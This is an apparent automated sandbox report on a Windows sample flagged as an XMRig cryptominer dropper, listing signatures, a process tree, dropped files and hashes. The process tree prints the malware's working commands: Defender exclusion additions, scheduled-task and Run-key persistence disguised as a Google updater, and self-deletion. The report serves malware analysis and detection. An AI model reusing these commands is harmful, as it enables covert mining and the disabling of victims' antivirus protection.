Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1801s
  • max time network
    1790s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/JqLvG94UkYjhxAeg.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 30 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1224
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\JqLvG94UkYjhxAeg.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\JqLvG94UkYjhxAeg.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2884
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2772
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2692
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:2576
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\JqLvG94UkYjhxAeg.exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2652
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2628
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:660
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1200
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
          2⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1060
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
            3⤵
            • Creates scheduled task(s)
            PID:2900
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
          2⤵
          • Drops file in Program Files directory
          PID:1796
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
          2⤵
          • Drops file in Program Files directory
          • Suspicious use of WriteProcessMemory
          PID:2164
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe qtdiqnkejoz
          2⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious behavior: EnumeratesProcesses
          PID:1912
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2040
      • C:\Windows\System32\choice.exe
        choice /C Y /N /D Y /T 3
        1⤵
          PID:2336
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {BF5879E8-3217-4632-B510-7867E4BCC3D3} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:552
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:572
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic PATH Win32_VideoController GET Name, VideoProcessor
          1⤵
          • Detects videocard installed
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:1596

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          309KB

          MD5

          4a326e6ffa5bb022a00e6e052051335a

          SHA1

          a2aa5cd84e8c775c2b90d2a5e1f4c9b4417342ed

          SHA256

          c85f1195cab42a8e11e7b532f13a5b2051490ae7d79a7e7e88bacb5bdffb97ee

          SHA512

          9edb0567abb3df935627d2ae8e10493c7cb4fa289f6a043da44d7cff26330e26297822c3eb61238b7f23876e72ddcb2c6bc67dd6ce9dcf00105e0b504fedaba3

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          1.5MB

          MD5

          db5a6dcba75dd7a4c9390959cebc30ab

          SHA1

          c2e75d5b1a9f6c63b0137061faa3f7970926b6f5

          SHA256

          f482e702f5c5e74ae53c4bb88548a2628acf96fed528190978081e735b732b11

          SHA512

          66f82df5f7699c9378e27ba66835f9f7de992a4eacee28f9de0b1310753655a8f4ff56e15dc39130c0993b3a18833fc55034460b2a4f14c8a74557c456d92e73

        • C:\Program Files\Google\Libs\g.log
          Filesize

          198B

          MD5

          37dd19b2be4fa7635ad6a2f3238c4af1

          SHA1

          e5b2c034636b434faee84e82e3bce3a3d3561943

          SHA256

          8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

          SHA512

          86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZPY5B8ZGZ9CWR0KTW6YA.temp
          Filesize

          7KB

          MD5

          37df624c2f8ef26b018e52c1fb05ef23

          SHA1

          3e4ee427d5094f020b3ddf547ce86ba4da916351

          SHA256

          014fcdfabe2558910aee836e8c6960cde57e90778343e85756b47204ecb1d94a

          SHA512

          e09f28443239ab60bb7717fc9422e18cbbfdffcd0f19a94e97524eb903b4860cbb77535b07e7c73d3ea38267b786f87c83beeb70fcfd39e8bc1a90f96013d34e

        • \Program Files\Google\Chrome\updater.exe
          Filesize

          387KB

          MD5

          14e672953ee80ab5a1a48e5e87dae47b

          SHA1

          96339234c52facb3a7c7be6c1c892f19b656d187

          SHA256

          5abaf9ad1c080e63fbaf090286ab5617dc7c1e8f4a235f1415bb5073e0a5e419

          SHA512

          b20edbd7480977e60ed49af4ab6a3667e58d11a0dfeddcdbc19183d06a256843b7b969e02b79c0aee02160f160797d34ed72f47bb96de709d1081a9e920d6f32

        • memory/572-61-0x000000013F5E0000-0x000000013F7F1000-memory.dmp
          Filesize

          2.1MB

        • memory/572-43-0x000000013F5E0000-0x000000013F7F1000-memory.dmp
          Filesize

          2.1MB

        • memory/1060-57-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp
          Filesize

          9.6MB

        • memory/1060-55-0x0000000001180000-0x0000000001200000-memory.dmp
          Filesize

          512KB

        • memory/1060-56-0x0000000001180000-0x0000000001200000-memory.dmp
          Filesize

          512KB

        • memory/1060-54-0x0000000001180000-0x0000000001200000-memory.dmp
          Filesize

          512KB

        • memory/1060-53-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp
          Filesize

          9.6MB

        • memory/1060-52-0x0000000001180000-0x0000000001200000-memory.dmp
          Filesize

          512KB

        • memory/1060-51-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp
          Filesize

          9.6MB

        • memory/1200-46-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp
          Filesize

          9.6MB

        • memory/1200-49-0x00000000010E0000-0x0000000001160000-memory.dmp
          Filesize

          512KB

        • memory/1200-48-0x00000000010E0000-0x0000000001160000-memory.dmp
          Filesize

          512KB

        • memory/1200-47-0x00000000010E0000-0x0000000001160000-memory.dmp
          Filesize

          512KB

        • memory/1200-50-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp
          Filesize

          9.6MB

        • memory/1200-45-0x00000000010E0000-0x0000000001160000-memory.dmp
          Filesize

          512KB

        • memory/1200-44-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp
          Filesize

          9.6MB

        • memory/1912-69-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/1912-73-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/2040-84-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-101-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-133-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-131-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-129-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-127-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-125-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-123-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-121-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-119-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-117-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-115-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-113-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-111-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-109-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-107-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-105-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-103-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-94-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-92-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-90-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-62-0x0000000000040000-0x0000000000060000-memory.dmp
          Filesize

          128KB

        • memory/2040-63-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-88-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-86-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-67-0x0000000000D10000-0x0000000000D30000-memory.dmp
          Filesize

          128KB

        • memory/2040-68-0x0000000000D30000-0x0000000000D50000-memory.dmp
          Filesize

          128KB

        • memory/2040-82-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-70-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-72-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-80-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-74-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-75-0x0000000000D10000-0x0000000000D30000-memory.dmp
          Filesize

          128KB

        • memory/2040-77-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2040-78-0x0000000000D30000-0x0000000000D50000-memory.dmp
          Filesize

          128KB

        • memory/2628-37-0x000000000267B000-0x00000000026E2000-memory.dmp
          Filesize

          412KB

        • memory/2628-36-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp
          Filesize

          9.6MB

        • memory/2628-39-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp
          Filesize

          9.6MB

        • memory/2628-38-0x0000000002674000-0x0000000002677000-memory.dmp
          Filesize

          12KB

        • memory/2628-34-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp
          Filesize

          9.6MB

        • memory/2628-35-0x0000000002670000-0x00000000026F0000-memory.dmp
          Filesize

          512KB

        • memory/2692-26-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp
          Filesize

          9.6MB

        • memory/2692-23-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp
          Filesize

          9.6MB

        • memory/2692-25-0x0000000002400000-0x0000000002480000-memory.dmp
          Filesize

          512KB

        • memory/2692-24-0x0000000002400000-0x0000000002480000-memory.dmp
          Filesize

          512KB

        • memory/2692-22-0x0000000002400000-0x0000000002480000-memory.dmp
          Filesize

          512KB

        • memory/2692-19-0x000000001B1D0000-0x000000001B4B2000-memory.dmp
          Filesize

          2.9MB

        • memory/2692-21-0x0000000002250000-0x0000000002258000-memory.dmp
          Filesize

          32KB

        • memory/2692-20-0x000007FEF52D0000-0x000007FEF5C6D000-memory.dmp
          Filesize

          9.6MB

        • memory/2772-13-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp
          Filesize

          9.6MB

        • memory/2772-11-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp
          Filesize

          9.6MB

        • memory/2772-12-0x0000000002620000-0x00000000026A0000-memory.dmp
          Filesize

          512KB

        • memory/2772-10-0x0000000002620000-0x00000000026A0000-memory.dmp
          Filesize

          512KB

        • memory/2772-5-0x000000001B260000-0x000000001B542000-memory.dmp
          Filesize

          2.9MB

        • memory/2772-9-0x0000000002620000-0x00000000026A0000-memory.dmp
          Filesize

          512KB

        • memory/2772-7-0x0000000002520000-0x0000000002528000-memory.dmp
          Filesize

          32KB

        • memory/2772-8-0x0000000002620000-0x00000000026A0000-memory.dmp
          Filesize

          512KB

        • memory/2772-6-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp
          Filesize

          9.6MB

        • memory/2884-28-0x000000013F870000-0x000000013FA81000-memory.dmp
          Filesize

          2.1MB

        • memory/2884-0-0x000000013F870000-0x000000013FA81000-memory.dmp
          Filesize

          2.1MB